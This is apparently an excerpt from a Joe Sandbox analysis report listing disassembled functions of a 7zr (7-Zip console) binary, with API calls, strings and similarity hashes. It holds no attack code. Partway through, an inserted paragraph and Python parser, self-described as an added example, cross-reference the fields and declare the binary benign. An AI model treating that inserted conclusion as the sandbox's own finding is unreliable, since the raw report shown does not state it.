                              • Part of subcall function 006D6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 006D6C1A
                              • Part of subcall function 006D6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 006D6C49
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                            • String ID: :$DATA
                            • API String ID: 3316598575-2587938151
                            • Opcode ID: e2f86df79d449c33ffa1257922df758d4f7fcc976912dba75519443a94a21e45
                            • Instruction ID: 3c0d074fdb860dd0da2ae9f1897e9c86b5804e4a0dff5d65b49b0f59c33c6589
                            • Opcode Fuzzy Hash: e2f86df79d449c33ffa1257922df758d4f7fcc976912dba75519443a94a21e45
                            • Instruction Fuzzy Hash: C3E1E070D042099ACF21EFA4C895AEEB7B3AF15314F10451FF8466B3D2EB70A94ACB55
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E6FCA
                              • Part of subcall function 006E6E71: __EH_prolog.LIBCMT ref: 006E6E76
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                            • API String ID: 3519838083-394804653
                            • Opcode ID: 23891623b49f96454e2b10eeb8aaaf46641057555defb7c86e3ea450b9074e1e
                            • Instruction ID: aa5710929b98c92195b2327d85dfc93b7b7f71eadc5e0a5ea5baed661d47277b
                            • Opcode Fuzzy Hash: 23891623b49f96454e2b10eeb8aaaf46641057555defb7c86e3ea450b9074e1e
                            • Instruction Fuzzy Hash: 4A4193B290A3C49BCF21DFA6C4509EEBBF6AF59340F58446EE086A3341C6706E45C765
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog
                            • String ID: =
                            • API String ID: 2614055831-2525689732
                            • Opcode ID: ce9be7827c87ba3bd9a6d68d58679a777e4fcc33e6302261df0f6bf0fe6416b3
                            • Instruction ID: 4f248bb9e313fe5fabf3bd65afe1532edaca8315116169eee5dcb6fa454e8b38
                            • Opcode Fuzzy Hash: ce9be7827c87ba3bd9a6d68d58679a777e4fcc33e6302261df0f6bf0fe6416b3
                            • Instruction Fuzzy Hash: F3218E32904108EBCF4AEB94DD56AEDBBB6EF48310F20412FE401722A1DFB56E54CB95
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071BDBA
                              • Part of subcall function 0071BE69: __EH_prolog.LIBCMT ref: 0071BE6E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: w$0w$Dw
                            • API String ID: 3519838083-1785023824
                            • Opcode ID: 0c470e32a9b972eeadd9977ec16203266e796d6a1503ef1163406fdafaae313e
                            • Instruction ID: 627ad17d9369f74f3d7ede3d94b2678b02a97df6a662d3b434196fd6253f0245
                            • Opcode Fuzzy Hash: 0c470e32a9b972eeadd9977ec16203266e796d6a1503ef1163406fdafaae313e
                            • Instruction Fuzzy Hash: 931102B0941B44CFC721DF69C188686FBE4BF18348F90C8AED0AA87712C7B8A548CB50
                            APIs
                            • __EH_prolog.LIBCMT ref: 00708346
                            • fputs.MSVCRT ref: 0070835B
                            • fputs.MSVCRT ref: 00708364
                              • Part of subcall function 007083BF: __EH_prolog.LIBCMT ref: 007083C4
                              • Part of subcall function 007083BF: fputs.MSVCRT ref: 00708401
                              • Part of subcall function 007083BF: fputs.MSVCRT ref: 00708437
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog
                            • String ID: =
                            • API String ID: 2614055831-2525689732
                            • Opcode ID: 92fff8f843fde0165e1671e0ff54c2f2d86d8b759e6cb8bd8240ba8fd1f2aca9
                            • Instruction ID: cd5624c42f95605de865d6aafa21de3cbdbc4e06d22ca42642e7179a6da59ef5
                            • Opcode Fuzzy Hash: 92fff8f843fde0165e1671e0ff54c2f2d86d8b759e6cb8bd8240ba8fd1f2aca9
                            • Instruction Fuzzy Hash: B701D671E00008EBCF56BBA4D812AEDBBB6EF84750F00802EF445562A1CFB84A55DBD5
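                            The per-function blocks above follow a fixed text layout (APIs with ref addresses, Strings with xrefs, and the Similarity fields API ID, String ID, API String ID and the two fuzzy hashes), so they can be parsed and cross-referenced instead of read one by one. The two entries immediately above, for instance, carry the same API String ID 2614055831-2525689732 and String ID "=" but different Opcode and Instruction Fuzzy Hashes: two distinct functions with the same import-and-string profile. The strings across these entries ("Can't allocate required memory", "Duplicate archive path:", "Incorrect reparse stream", "Cannot find archive file") are consistent with the 7zr snapshot name, i.e. a bundled 7-Zip console binary rather than attacker code, which is the kind of conclusion such cross-referencing is meant to reach quickly. The following Python is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses a constructed sample (four entries excerpted from this page, trimmed to the fields read) and reports functions that share an API String ID. The names SAMPLE, FunctionEntry, parse_listing, shared_signatures and imports_called are this example's own.

```python
"""Parse Joe Sandbox per-function listing text (APIs / Strings / Similarity
blocks) and cross-reference the Similarity fields across functions."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: four entries excerpted from the report above, trimmed to
# the fields this parser reads. A real report carries many more per module.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 006D9CB3
• GetProcAddress.KERNEL32(00000000), ref: 006D9CBA
• GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 006D9CC8
• GlobalMemoryStatus.KERNEL32(?), ref: 006D9CFA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
Similarity
• API ID: GlobalMemoryStatus$AddressHandleModuleProc
• String ID: $@$GlobalMemoryStatusEx$kernel32.dll
• API String ID: 180289352-802862622
• Opcode Fuzzy Hash: 0ec75e4b8d9ce51683d965fa7a3259bcf7fa671139c224e10beb4e276d946294
• Instruction Fuzzy Hash: 091109B0D102099BDF20DF94D84AA9DB7F6BF08745F10441ED446EB340E778A984CB64
APIs
• __EH_prolog.LIBCMT ref: 006F185D
  • Part of subcall function 006F021A: __EH_prolog.LIBCMT ref: 006F021F
• _CxxThrowException.MSVCRT(?,00786010), ref: 006F1961
Strings
• Duplicate archive path:, xrefs: 006F1A8D
Memory Dump Source
Similarity
• API ID: H_prolog$ExceptionThrow
• String ID: Duplicate archive path:
• API String ID: 2366012087-4000988232
• Opcode Fuzzy Hash: f2ddcd4c9a587acf1021036b809659586102da18c3f4b473f2bb3bca79cc5cc3
• Instruction Fuzzy Hash: ED81AF31D00248EFCF15EFA4D495AEDB7B2AF0A350F1040AEE51677292DB74AE05CB64
APIs
Strings
Similarity
• API ID: fputs$H_prolog
• String ID: =
• API String ID: 2614055831-2525689732
• Opcode Fuzzy Hash: ce9be7827c87ba3bd9a6d68d58679a777e4fcc33e6302261df0f6bf0fe6416b3
• Instruction Fuzzy Hash: F3218E32904108EBCF4AEB94DD56AEDBBB6EF48310F20412FE401722A1DFB56E54CB95
APIs
• __EH_prolog.LIBCMT ref: 00708346
• fputs.MSVCRT ref: 0070835B
• fputs.MSVCRT ref: 00708364
Strings
Similarity
• API ID: fputs$H_prolog
• String ID: =
• API String ID: 2614055831-2525689732
• Opcode Fuzzy Hash: 92fff8f843fde0165e1671e0ff54c2f2d86d8b759e6cb8bd8240ba8fd1f2aca9
• Instruction Fuzzy Hash: B701D671E00008EBCF56BBA4D812AEDBBB6EF84750F00802EF445562A1CFB84A55DBD5
"""

# "• Name.MODULE(args), ref: ADDR" and the indented
# "• Part of subcall function ADDR: Name.MODULE ref: ADDR" variant.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
STR_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<xref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Control-flow Graph"}


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)      # (name, module, ref) direct calls
    subcalls: list = field(default_factory=list)  # (callee, name, module, ref)
    strings: list = field(default_factory=list)   # (text, xref)
    similarity: dict = field(default_factory=dict)  # Similarity key -> value

    @property
    def first_ref(self):
        """Address of the first direct API call; a usable label since the
        listing never names the function itself."""
        return self.apis[0][2] if self.apis else None


def parse_listing(text):
    """Split listing text into FunctionEntry objects. 'Instruction Fuzzy Hash'
    is the last Similarity field of every entry, so it closes the entry."""
    entries, cur, section = [], FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m and m["sub"]:
                cur.subcalls.append((m["sub"].upper(), m["name"], m["module"], m["ref"].upper()))
            elif m:
                cur.apis.append((m["name"], m["module"], m["ref"].upper()))
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                cur.strings.append((m["text"], m["xref"].upper()))
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                cur.similarity[m["key"]] = m["val"].strip()
                if m["key"] == "Instruction Fuzzy Hash":
                    entries.append(cur)
                    cur, section = FunctionEntry(), None
    return entries


def group_by(entries, key="API String ID"):
    groups = defaultdict(list)
    for e in entries:
        value = e.similarity.get(key, "")
        if value:
            groups[value].append(e)
    return dict(groups)


def shared_signatures(entries, key="API String ID"):
    """Values of `key` carried by more than one function. A shared API String
    ID with differing fuzzy hashes means distinct code with the same import and
    string profile; a shared Opcode Fuzzy Hash would mean near-identical code."""
    return {k: v for k, v in group_by(entries, key).items() if len(v) > 1}


def imports_called(entries):
    """Sorted (name, module) pairs over all direct API calls, for a quick
    capability review of the module."""
    return sorted({(name, mod) for e in entries for name, mod, _ in e.apis})


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    print(f"{len(parsed)} functions parsed")
    for sig, funcs in shared_signatures(parsed).items():
        print(f"API String ID {sig} shared by {len(funcs)} functions at",
              [f.first_ref or "?" for f in funcs])
    print("imports:", imports_called(parsed))
```

Run it on a whole report export by replacing SAMPLE with the file contents; grouping on "Opcode Fuzzy Hash" instead of "API String ID" finds functions that are byte-for-byte near-duplicates, which is what matters when comparing a dropped file against a known-good copy of the same tool.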
                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,006EAB57), ref: 00767DAA
                            • GetLastError.KERNEL32(?,00000000,006EAB57), ref: 00767DBB
                            • CloseHandle.KERNELBASE(00000000,?,00000000,006EAB57), ref: 00767DCF
                            • GetLastError.KERNEL32(?,00000000,006EAB57), ref: 00767DD9
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$CloseHandleObjectSingleWait
                            • String ID:
                            • API String ID: 1796208289-0
                            • Opcode ID: a5ada12c0cb7968a5a3407522dc5938a185b31dfc0ec1b6655d82e0f6c5e0d72
                            • Instruction ID: 9b8395d59686b86d50dd6cad2fd17676401a0be2d0d0b484b69e18db56afaa75
                            • Opcode Fuzzy Hash: a5ada12c0cb7968a5a3407522dc5938a185b31dfc0ec1b6655d82e0f6c5e0d72
                            • Instruction Fuzzy Hash: 02F0FE7130820247EB296ABD9C84B36669CAF553FCB244B29ED66D21D4EB6CCC40CA60
                            APIs
                            • EnterCriticalSection.KERNEL32(00792938), ref: 0070588B
                            • LeaveCriticalSection.KERNEL32(00792938), ref: 007058BC
                              • Part of subcall function 0070C911: GetTickCount.KERNEL32 ref: 0070C926
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CriticalSection$CountEnterLeaveTick
                            • String ID: v$8)y
                            • API String ID: 1056156058-625179386
                            • Opcode ID: db25da4c5d408a4d601769827aa738e4e682b37a9f648719a56be7f7a55cbbe6
                            • Instruction ID: eec2e94a0c405a9cfdc2a3b2fd3e1f61cbb0165a307d51fdb1baa834366bf934
                            • Opcode Fuzzy Hash: db25da4c5d408a4d601769827aa738e4e682b37a9f648719a56be7f7a55cbbe6
                            • Instruction Fuzzy Hash: 3DE06D75505210DFC305DF14D808E8A37E5AF98311F05467DF409873A2C7389845CBB5
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F209B
                              • Part of subcall function 006D757D: GetLastError.KERNEL32(006DD14C), ref: 006D757D
                              • Part of subcall function 006F2C6C: __EH_prolog.LIBCMT ref: 006F2C71
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ErrorLastfree
                            • String ID: Cannot find archive file$The item is a directory
                            • API String ID: 683690243-1569138187
                            • Opcode ID: 6acc726eb4993fda71862172ebd59172f8e20bca1e3a2ac4794fcc81a1f57a8e
                            • Instruction ID: 84a9fe5d953acac47003e05211799139e14907898e0aa73e6654aefc21cc834a
                            • Opcode Fuzzy Hash: 6acc726eb4993fda71862172ebd59172f8e20bca1e3a2ac4794fcc81a1f57a8e
                            • Instruction Fuzzy Hash: CD723470D00259DFCB65DFA8C890BEDBBB2AF59300F14409AE959AB352CB709E81CF55
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CountTickfputs
                            • String ID: .
                            • API String ID: 290905099-4150638102
                            • Opcode ID: 47f36793ac9876eadeb0b58c341cc9e22fe613f7161ddd3218c963404d5c5ffc
                            • Instruction ID: 8e3e2562bf332e9581312b0850688bd6296e50f3862a9e435fcdb3380dd36519
                            • Opcode Fuzzy Hash: 47f36793ac9876eadeb0b58c341cc9e22fe613f7161ddd3218c963404d5c5ffc
                            • Instruction Fuzzy Hash: 7B715970A00B05DFCB62EF64C491AAAB7F6AF91300F044A1EE08797681DB78B849CB15
                            APIs
                              • Part of subcall function 006D9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 006D9CB3
                              • Part of subcall function 006D9C8F: GetProcAddress.KERNEL32(00000000), ref: 006D9CBA
                              • Part of subcall function 006D9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 006D9CC8
                            • __aulldiv.LIBCMT ref: 0071093F
                            • __aulldiv.LIBCMT ref: 0071094B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                            • String ID: 3333
                            • API String ID: 3520896023-2924271548
                            • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                            • Instruction ID: 099e897796d788eb3d1477a949d53f8ea5c5eb0829b211acfeab7bf7b9e0f4a6
                            • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                            • Instruction Fuzzy Hash: 53219AB1900704AFE730DF699885B5BBAF9EB84750F00892FF186D7641D674A9808BA5
                            APIs
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            • memset.MSVCRT ref: 006FAEBA
                            • memset.MSVCRT ref: 006FAECD
                              • Part of subcall function 007104D2: _CxxThrowException.MSVCRT(?,00784A58), ref: 007104F8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memset$ExceptionThrowfree
                            • String ID: Split
                            • API String ID: 1404239998-1882502421
                            • Opcode ID: 48c269dca69d828c497b9caba6e912868a3371fded00fa5c092a3f6d0907bd5c
                            • Instruction ID: aa5095f1fb8b2e3f0111315fa29032ce543b4537a3d87de45215bfad40f4323c
                            • Opcode Fuzzy Hash: 48c269dca69d828c497b9caba6e912868a3371fded00fa5c092a3f6d0907bd5c
                            • Instruction Fuzzy Hash: 804239B0A0424DDFDB25DBA4C984BEDBBB6BF09304F1440A9E649A7351CB71AE85CB11
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D759F
                              • Part of subcall function 006D764C: CloseHandle.KERNELBASE(00000000,?,006D75AF,00000002,?,00000000,00000000), ref: 006D7657
                            • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 006D75E5
                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 006D7626
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CreateFile$CloseH_prologHandle
                            • String ID:
                            • API String ID: 449569272-0
                            • Opcode ID: fbecea208cd03f28a4ce832093c26105b5a59eec9a23e529f0965ac79055946e
                            • Instruction ID: ba8f409d483a34966787e62003dfd75fe13b3269c7199f6a83ba0c5857497c7a
                            • Opcode Fuzzy Hash: fbecea208cd03f28a4ce832093c26105b5a59eec9a23e529f0965ac79055946e
                            • Instruction Fuzzy Hash: 1411AF7280020AEFCF11AFA8DC408EEBB7BFF54354B14892EF860562A1DB358D61DB51
                            APIs
                            • fputs.MSVCRT ref: 00708437
                            • fputs.MSVCRT ref: 00708401
                              • Part of subcall function 006D1FB3: __EH_prolog.LIBCMT ref: 006D1FB8
                            • __EH_prolog.LIBCMT ref: 007083C4
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputs$fputc
                            • String ID:
                            • API String ID: 678540050-0
                            • Opcode ID: cd13e256e505c0cc175470ecedb4efa4411d3415a39f9bc9c902c0fd00664416
                            • Instruction ID: 78dfbe94d8e60e2b6659b1834065cca832b93c577a0c114a5aa9931dabf948e0
                            • Opcode Fuzzy Hash: cd13e256e505c0cc175470ecedb4efa4411d3415a39f9bc9c902c0fd00664416
                            • Instruction Fuzzy Hash: 0E11C231E04105ABCF4ABBA0D8239AEBBA7DF85790F00002FF502963D1CFA959418AD9
                            APIs
                            • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,006D77DB,?,?,00000000,?,006D7832,?), ref: 006D7773
                            • GetLastError.KERNEL32(?,006D77DB,?,?,00000000,?,006D7832,?,?,?,?,00000000), ref: 006D7780
                            • SetLastError.KERNEL32(00000000,?,?,006D77DB,?,?,00000000,?,006D7832,?,?,?,?,00000000), ref: 006D7797
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$FilePointer
                            • String ID:
                            • API String ID: 1156039329-0
                            • Opcode ID: f8cee92b0e96bb601ab2696f475d02c332eeae71a1fa5a3e64707d976da0dece
                            • Instruction ID: 45ddf4c8eec1377054a7233c42d006fa687f70e9db7e04f643728aa69357e88e
                            • Opcode Fuzzy Hash: f8cee92b0e96bb601ab2696f475d02c332eeae71a1fa5a3e64707d976da0dece
                            • Instruction Fuzzy Hash: 1811DD70A00309AFEF118F68DC45BEA3BE6AB08360F10882AF81697391E7B49D509B55
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D5A91
                            • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 006D5AB7
                            • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 006D5AEC
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AttributesFile$H_prolog
                            • String ID:
                            • API String ID: 3790360811-0
                            • Opcode ID: 4aa9c07b16ed8a80bcdd48b47becf85ffbd69cb78119419e45eeed3a09735141
                            • Instruction ID: de42c3583f46842bcef11e1c6ceff67f25951310bd8d28f857a7757b7671ac82
                            • Opcode Fuzzy Hash: 4aa9c07b16ed8a80bcdd48b47becf85ffbd69cb78119419e45eeed3a09735141
                            • Instruction Fuzzy Hash: EA01F532D00215ABCF05ABA9D9916FEB777EF45350F18443BEC1263751CB398C01DA50
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E5BEF
                              • Part of subcall function 006E54C0: __EH_prolog.LIBCMT ref: 006E54C5
                              • Part of subcall function 006E5630: __EH_prolog.LIBCMT ref: 006E5635
                              • Part of subcall function 006F36EA: __EH_prolog.LIBCMT ref: 006F36EF
                              • Part of subcall function 006E57C1: __EH_prolog.LIBCMT ref: 006E57C6
